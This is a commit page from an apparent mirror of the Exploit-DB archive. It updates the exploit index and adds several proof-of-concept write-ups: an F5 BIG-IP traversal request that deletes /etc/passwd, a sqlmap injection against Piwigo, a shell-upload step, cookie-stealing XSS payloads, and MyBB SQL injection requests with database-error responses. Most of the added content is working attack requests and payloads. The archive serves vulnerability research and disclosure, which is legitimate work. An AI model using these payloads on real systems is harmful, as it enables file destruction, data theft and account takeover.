bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_15_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-15 04:45:59 +00:00
parent 721a7b30af
commit da2dbbdc68
16 changed files with 1258 additions and 154 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
files.csv
View file

@ -14128,7 +14128,7 @@ id,file,description,date,author,platform,type,port
16358,platforms/windows/remote/16358.rb,"Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",2010-09-20,metasploit,windows,remote,0 16358,platforms/windows/remote/16358.rb,"Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",2010-09-20,metasploit,windows,remote,0
16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,metasploit,windows,remote,0 16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,metasploit,windows,remote,0
16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,metasploit,windows,remote,0 16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,metasploit,windows,remote,0
16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service Impersonation Vulnerability",2011-02-17,metasploit,windows,remote,0 16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service - Impersonation Vulnerability (MS10-061)",2011-02-17,metasploit,windows,remote,0
16362,platforms/windows/remote/16362.rb,"Microsoft Server Service Relative Path Stack Corruption",2011-01-21,metasploit,windows,remote,0 16362,platforms/windows/remote/16362.rb,"Microsoft Server Service Relative Path Stack Corruption",2011-01-21,metasploit,windows,remote,0
16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0 16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0
16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,metasploit,windows,remote,0 16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,metasploit,windows,remote,0
@ -15842,7 +15842,7 @@ id,file,description,date,author,platform,type,port
18328,platforms/netware/dos/18328.txt,"Novell Netware XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18328,platforms/netware/dos/18328.txt,"Novell Netware XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0
18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0
18330,platforms/php/webapps/18330.txt,"wordpress pay with tweet plugin <= 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 18330,platforms/php/webapps/18330.txt,"wordpress pay with tweet plugin <= 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0
18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro 0day",2012-01-08,"b33f g11tch",windows,local,0 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (0day)",2012-01-08,"b33f & g11tch",windows,local,0
18335,platforms/php/webapps/18335.txt,"MangosWeb SQL Injection Vulnerability",2012-01-08,Hood3dRob1n,php,webapps,0 18335,platforms/php/webapps/18335.txt,"MangosWeb SQL Injection Vulnerability",2012-01-08,Hood3dRob1n,php,webapps,0
18336,platforms/hardware/dos/18336.pl,"AirTies-4450 Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 18336,platforms/hardware/dos/18336.pl,"AirTies-4450 Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0
18337,platforms/windows/dos/18337.pl,"M-Player 0.4 - Local Denial of Service Vulnerability",2012-01-08,JaMbA,windows,dos,0 18337,platforms/windows/dos/18337.pl,"M-Player 0.4 - Local Denial of Service Vulnerability",2012-01-08,JaMbA,windows,dos,0
@ -15853,7 +15853,7 @@ id,file,description,date,author,platform,type,port
18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable Remote File Inclusion Vulnerability",2012-01-09,"Opa Yong",php,webapps,0 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable Remote File Inclusion Vulnerability",2012-01-09,"Opa Yong",php,webapps,0
18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0 18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0
18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 Path Traversal Vulnerability",2012-01-10,chap0,php,webapps,0 18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 Path Traversal Vulnerability",2012-01-10,chap0,php,webapps,0
18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0
18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0
18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0
18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0
@ -19708,7 +19708,7 @@ id,file,description,date,author,platform,type,port
22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 Index.CFM SQL Injection Vulnerability",2003-04-14,"Jim Dew",cfm,webapps,0 22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 Index.CFM SQL Injection Vulnerability",2003-04-14,"Jim Dew",cfm,webapps,0
22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 Information Disclosure Vulnerability",2003-04-14,drG4njubas,asp,webapps,0 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 Information Disclosure Vulnerability",2003-04-14,drG4njubas,asp,webapps,0
22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 site.ini Information Disclosure Vulnerability",2003-04-15,"gregory Le Bras",windows,remote,0 22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 site.ini Information Disclosure Vulnerability",2003-04-15,"gregory Le Bras",windows,remote,0
22489,platforms/windows/shellcode/22489.cpp,"Windows XP PRO SP3 - Full ROP calc shellcode",2012-11-05,b33f,windows,shellcode,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc shellcode",2012-11-05,b33f,windows,shellcode,0
22490,platforms/multiple/webapps/22490.txt,"ZPanel <= 10.0.1 CSRF, XSS, SQLi, Password Reset",2012-11-05,pcsjj,multiple,webapps,0 22490,platforms/multiple/webapps/22490.txt,"ZPanel <= 10.0.1 CSRF, XSS, SQLi, Password Reset",2012-11-05,pcsjj,multiple,webapps,0
22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0
22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0
@ -31656,6 +31656,7 @@ id,file,description,date,author,platform,type,port
35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0
35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0 35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0
35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - XSS Vulnerability",2014-11-02,evi1m0,php,webapps,0
35140,platforms/php/webapps/35140.txt,"MyBB 1.6 search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35140,platforms/php/webapps/35140.txt,"MyBB 1.6 search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0
35141,platforms/php/webapps/35141.txt,"MyBB 1.6 private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35141,platforms/php/webapps/35141.txt,"MyBB 1.6 private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0
35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross Site Scripting Vulnerability",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross Site Scripting Vulnerability",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0
@ -31711,7 +31712,19 @@ id,file,description,date,author,platform,type,port
35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0 35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0
35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001
35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80
35213,platforms/windows/remote/35213.html,"Internet Explorer 8 MS14-035 Use-After-Free Exploit",2014-11-10,"Ayman Sagy",windows,remote,0
35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0
35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80
35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 (picture.php, rate param) - SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80
35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0
35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80
35224,platforms/php/webapps/35224.txt,"MyBB 1.8.X - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80
35225,platforms/windows/remote/35225.c,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,windows,remote,0
35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0
35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0
35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
35229,platforms/windows/remote/35229.html,"Internet Explorer <11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0
35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0

Can't render this file because it is too large.

55
platforms/jsp/webapps/35222.txt Executable file
View file

@ -0,0 +1,55 @@
+------------------------------------------------------+
+ F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability +
+------------------------------------------------------+
Affected Product : F5 BIG-IP
Vendor Homepage : http://www.f5.com/
Version : 10.1.0
Vulnerability Category : Local vulnerability
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
CVE : CVE-2014-8727
Patched : Yes
+-------------+
+ Description +
+-------------+
An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to arbitrary enumerate files and subsequently delete them off the OS level. Any system file deletion, for instance under /etc, /boot etc would have a major functionality and operational impact for the device.
+----------------------+
+ Exploitation Details +
+----------------------+
An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to enumerate files on the operating system and subsequently delete them off the OS level.
In order to trigger the flaw, send a HTTP GET request similar to: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd
Condition: If file does not exist the application will return "File not found." If the file exists, the user can either send, a similar to, the next HTTP POST request or simply click on the Delete button through the GUI -the button will be displayed only if the enumerated file exists-.
Sample HTTP POST request:
POST /tmui/Control/form HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?name=../../../../../etc/passwd
Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 937
_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete
+----------+
+ Solution +
+----------+
F5 has already patched and mitigated the issue, for more information see ID363027 at the following URL:
https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13109.html
https://support.f5.com/kb/en-us/products/big-ip_ltm/releasenotes/product/relnote_11_0_0_ltm.html
+---------------------+
+ Disclosure Timeline +
+---------------------+
03-11-2014: Vendor notified at security-reporting [at] f5 [dot] com
04-11-2014: Vendor responded with intent to investigate
04-11-2014: Shared details with vendor
05-11-2014: Vendor confirmed the issue is already patched, reference ID363027
12-11-2014: Public disclosure

7
platforms/linux/remote/35232.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45842/info
Pango is prone to a remote heap-corruption vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
http://www.exploit-db.com/sploits/35232.zip

9
platforms/multiple/webapps/35233.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45911/info
B-Cumulus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://www.example.com/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

21
platforms/php/webapps/35138.txt Executable file
View file

@ -0,0 +1,21 @@
/******************************************************
# Exploit Title: esotalk cms topics xss vulnerability
# Google Dork: powered by esotalk
# Date: 2014-11-01
# Vul Author: Evi1m0#ff0000team
# Vul Advisory: http://www.hackersoul.com/post/ff0000-hsdb-0006.html
# Vendor Homepage: http://esotalk.org/
# Software Link: http://esotalk.org/download
# Tested on: Linux / Windows
******************************************************/
esotalk cms topics xss vulnerability. The worst is at the topic page, Submit Comment:
Payload:
[url=[img]onmouseover=alert(document.cookie);//://hackersoul.com/image.jpg#"aaaaaa[/img]]evi1m0#knownsec[/url]
You see an alert.
Proof img url: http://www.hackersoul.com/img/media/37D2E7A3-8A88-4CE2-9E3E-E2.jpg

98
platforms/php/webapps/35221.txt Executable file
View file

@ -0,0 +1,98 @@
=============================================
MGC ALERT 2014-001
- Original release date: January 12, 2014
- Last revised: November 12, 2014
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Blind SQL Injection in Piwigo <= v2.6.0
II. BACKGROUND
-------------------------
Piwigo is a web application management photo albums, available under the
License GPL. Is written in PHP and requires a MySQL, PostgreSQL or SQLite
data.
III. DESCRIPTION
-------------------------
This bug was found using the portal without authentication. To exploit the
vulnerability only is needed use the version 1.0 of the HTTP protocol to
interact with the application. It is possible to inject SQL code in the
variable "rate" on the page "picture.php".
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
Blind SQL injection.
/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1)
Exploiting with SQLMap:
python sqlmap.py -u "
http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate" --data
"rate=1" --dbs
[16:32:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[16:32:25] [INFO] fetching database names
[16:32:25] [INFO] fetching number of databases
[16:32:25] [INFO] resumed: 4
[16:32:25] [INFO] resumed: information_schema
[16:32:25] [INFO] resumed: mysql
[16:32:25] [INFO] resumed: phpmyadmin
[16:32:25] [INFO] resumed: piwigo
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] piwigo
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
Piwigo <= v2.6.0
VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of transaction with them must be validated.
VIII. REFERENCES
-------------------------
http://www.piwigo.org
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
January 21, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
November 12, 2014 2: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

14
platforms/php/webapps/35223.txt Executable file
View file

@ -0,0 +1,14 @@
# Exploit Title: Digi Online Examination System Unrestricted File Upload Vulnerability
# Date: 12-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v2.0
# Software Link: http://codecanyon.net/item/digi-online-examination-system-does/8610180
# Software Test Link: http://s1.digitalvidhya.com/doesv2/
# Vulnerabilities Description:
===Unrestricted File Upload===
You can upload your shell from "Photo" section while register the system. And then chekc your shell from here; http://example.com/assets/uploads/images/shellname.php
=Solution=
Filter the files aganist to attacks.

195
platforms/php/webapps/35224.txt Executable file
View file

@ -0,0 +1,195 @@
#Title: MyBB 1.8.X - Multiple Vulnerabilities
#Date: 13.11.2014
#Tested on: Linux / Apache 2.2 / PHP 5 (localhost)
#Vendor: mybb.com
#Version: => 1.8.1 - Latest ATM
#Contact: smash@devilteam.pl
#Author: Smash_
Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on.
Sanitize your inputs ;)
1. SQL Injection
Vuln:
POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#
#1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#):
POST /mybb-1.8.1/member.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 408
regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register
#1 - Response:
HTTP/1.1 503 Service Temporarily Unavailable
Date: Thu, 13 Nov 2014 15:16:02 GMT
<div id="content">
<h2>MyBB SQL Error</h2>
<div id="error">
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
<dt>SQL Error:</dt>
<dd>1054 - Unknown column '9' in 'order clause'</dd>
<dt>Query:</dt>
SELECT q.*, s.sid
FROM mybb_questionsessions s
LEFT JOIN mybb_questions q ON (q.qid=s.qid)
WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#'
</dd>
#2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#):
POST /mybb-1.8.1/member.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 409
regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register
#2 - Response:
HTTP/1.1 200 OK
Date: Thu, 13 Nov 2014 15:21:15 GMT
(...)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register -->
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Forums - Registration</title>
#3 - Request (Final POC):
POST /mybb-1.8.1/member.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register
#3 - Response:
HTTP/1.1 503 Service Temporarily Unavailable
Date: Thu, 13 Nov 2014 15:24:34 GMT
(...)
<div id="content">
<h2>MyBB SQL Error</h2>
<div id="error">
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
<dt>SQL Error:</dt>
<dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd>
<dt>Query:</dt>
<dd>
SELECT q.*, s.sid
FROM mybb_questionsessions s
LEFT JOIN mybb_questions q ON (q.qid=s.qid)
WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#'
</dd>
</dl>
(...)
2. Cross Site Scripting
a) Reflected XSS - Report post
Vuln:
GET 'type' - XSS"><script>alert(666)</script>
localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1
Request:
GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1
Host: localhost
Response:
HTTP/1.1 200 OK
Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly
Content-Length: 1247
Content-Type: text/html
<div class="modal">
<div style="overflow-y: auto; max-height: 400px;" class="modal_0">
<form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);">
<input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" />
<input type="hidden" name="action" value="do_report" />
<input type="hidden" name="type" value="XSS"><script>alert(666)</script>" />
<input type="hidden" name="pid" value="0" />
b) Stored XSS - Signature
Vuln:
POST 'signature' - [video=youtube]http://youtube.com?"+xss="true"+666="[/video]
#1 - Request (change signature):
POST /mybb-1.8.1/usercp.php HTTP/1.1
Host: localhost
Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature
#2 - Request (user's profile):
GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1
Host: localhost
Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
#2 - Response:
HTTP/1.1 200 OK
Set-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnly
Content-Length: 12740
Content-Type: text/html; charset=UTF-8
(...)
<table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed">
<tr>
<td class="thead"><strong>user's Signature</strong></td>
</tr>
<tr>
